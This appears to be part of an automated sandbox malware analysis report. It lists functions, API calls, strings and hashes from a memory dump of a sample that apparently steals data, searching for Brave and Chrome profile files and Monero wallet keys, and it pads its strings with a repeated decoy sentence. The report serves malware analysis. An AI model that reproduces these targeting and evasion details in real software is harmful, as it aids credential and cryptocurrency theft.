GetProcAddress.KERNEL32(75A70000,01732578), ref: 00BF9B02
GetProcAddress.KERNEL32(75290000,01732530), ref: 00BF9B23
GetProcAddress.KERNEL32(75290000,017325A8), ref: 00BF9B3B
GetProcAddress.KERNEL32(75BD0000,01732548), ref: 00BF9B5D
GetProcAddress.KERNEL32(75450000,01725A28), ref: 00BF9B7E
GetProcAddress.KERNEL32(76E90000,01739260), ref: 00BF9B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00BF9BB6

Strings

NtQueryInformationProcess, xrefs: 00BF9BAA

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: a4e3679a05b9e149a3d9dcaac01860ed23345fd25434b64eea23b42cc87d1dd7
Instruction ID: 7fda3ccd00f2c9d54a499cedb911d064d096a1c78e27e9f1b13129d55bd53a35
Opcode Fuzzy Hash: a4e3679a05b9e149a3d9dcaac01860ed23345fd25434b64eea23b42cc87d1dd7
Instruction Fuzzy Hash: 6BA14CB55002409FD368EFAAFE88A6637F9F74C70170C453AE606E3264D739984BCB56

Function 00BE45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 00BE460F
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00BE479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE45F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE46D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE471E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00BE4638

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: f67fdf213d9ad74f6bf7777a871bba603db371fa2a29d7b44cab46b73bee6157
Instruction ID: c34bb25723b01821e83531c29a4341a0fb3bf08fd6c100831f6ba264224d114a
Opcode Fuzzy Hash: f67fdf213d9ad74f6bf7777a871bba603db371fa2a29d7b44cab46b73bee6157
Instruction Fuzzy Hash: C841D3607CA68CEBD628FBA48C4DFDE7BF65F96718F907064A900533C0DFA06900E925

Function 00BEBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

FindFirstFileA.KERNEL32(00000000,?,00C00B32,00C00B2B,00000000,?,?,?,00C013F4,00C00B2A), ref: 00BEBEF5
StrCmpCA.SHLWAPI(?,00C013F8), ref: 00BEBF4D
StrCmpCA.SHLWAPI(?,00C013FC), ref: 00BEBF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 00BEC7BF
FindClose.KERNEL32(000000FF), ref: 00BEC7D1

Strings

Preferences, xrefs: 00BEC11E
\Brave\Preferences, xrefs: 00BEC1DB
Brave, xrefs: 00BEC102
Google Chrome, xrefs: 00BEC634

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 3f5b515d1c1632901215ac58650513cc2a094d1833eb61604400128089509685
Instruction ID: db036f8f077ea223b893caef287bd354282f7b4a0707f61f910e32d96318cf71
Opcode Fuzzy Hash: 3f5b515d1c1632901215ac58650513cc2a094d1833eb61604400128089509685
Instruction Fuzzy Hash: 024226B15101089BCB18FB64DD56EFD73BDAB54300F4085A8BA0AA7191EF74AF4DCB92

Function 00BF4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00BF492C
FindFirstFileA.KERNEL32(?,?), ref: 00BF4943
StrCmpCA.SHLWAPI(?,00C00FDC), ref: 00BF4971
StrCmpCA.SHLWAPI(?,00C00FE0), ref: 00BF4987
FindNextFileA.KERNEL32(000000FF,?), ref: 00BF4B7D
FindClose.KERNEL32(000000FF), ref: 00BF4B92

Strings

%s\%s, xrefs: 00BF49A4
%s\%s, xrefs: 00BF49FB
%s\*, xrefs: 00BF4920

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 8035173a1c5f9c06763a31c322802d66d6556e3d3b2c89fdeef9dbfca51fd98c
Instruction ID: 8e1cf5862652a69696db157fae1210ad51c1f0e836d108bf7a794808a6cc7135
Opcode Fuzzy Hash: 8035173a1c5f9c06763a31c322802d66d6556e3d3b2c89fdeef9dbfca51fd98c
Instruction Fuzzy Hash: BA6112B1500219AFCB34EBA1DC49FFA73BCBB58701F0485D8E609A6141EB75AB49CF91

Function 00BF3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00BF3EC3
FindFirstFileA.KERNEL32(?,?), ref: 00BF3EDA
StrCmpCA.SHLWAPI(?,00C00FAC), ref: 00BF3F08
StrCmpCA.SHLWAPI(?,00C00FB0), ref: 00BF3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 00BF406C
FindClose.KERNEL32(000000FF), ref: 00BF4081

Strings

%s\%s, xrefs: 00BF3EB7

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 280042a1f33ca0bc44ec73d320d4fb2cf32435657c7b6da5c73a0bd81c1c18d9
Instruction ID: e85c7c94c0166bccfb207efa50c1e735ce759ad2fe3fdba2f0f7232c91af0b78
Opcode Fuzzy Hash: 280042a1f33ca0bc44ec73d320d4fb2cf32435657c7b6da5c73a0bd81c1c18d9
Instruction Fuzzy Hash: 245134B5900218ABCB28EBB5DC85EFA73BCBB54700F0445D8B759A6040DB75DB8E8F91

Function 00BEF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

